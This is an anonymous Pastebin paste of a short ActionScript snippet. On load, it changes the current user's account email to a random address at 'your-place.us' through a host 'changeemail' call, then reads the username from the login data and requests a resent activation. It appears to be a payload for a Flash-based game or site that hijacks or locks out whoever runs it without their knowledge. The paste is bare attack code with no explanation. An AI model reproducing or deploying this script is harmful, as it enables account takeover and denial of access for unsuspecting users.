Guest User

Untitled

a guest
Jan 21st, 2019
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. this.onLoad = function() {
  2.     var newEmail = random(999999999)+1+"@your-place.us";
  3.     var newEmailConfirm = newEmail;
  4.     getURL("lingo: executeCall \"changeemail\", \"e="+escape(newEmail)+"&ec="+escape(newEmailConfirm)+"\"", "");
  5.     setTimeout(sendActivation, 1000);
  6. };
  7. function sendActivation() {
  8.     var username = _global.loginXML.firstChild.firstChild.attributes.u;
  9.     getURL("lingo: executeCall \"resendactivation\", \"un="+escape(username)+"\"", "");
  10. }
Add Comment
Please, Sign In to add comment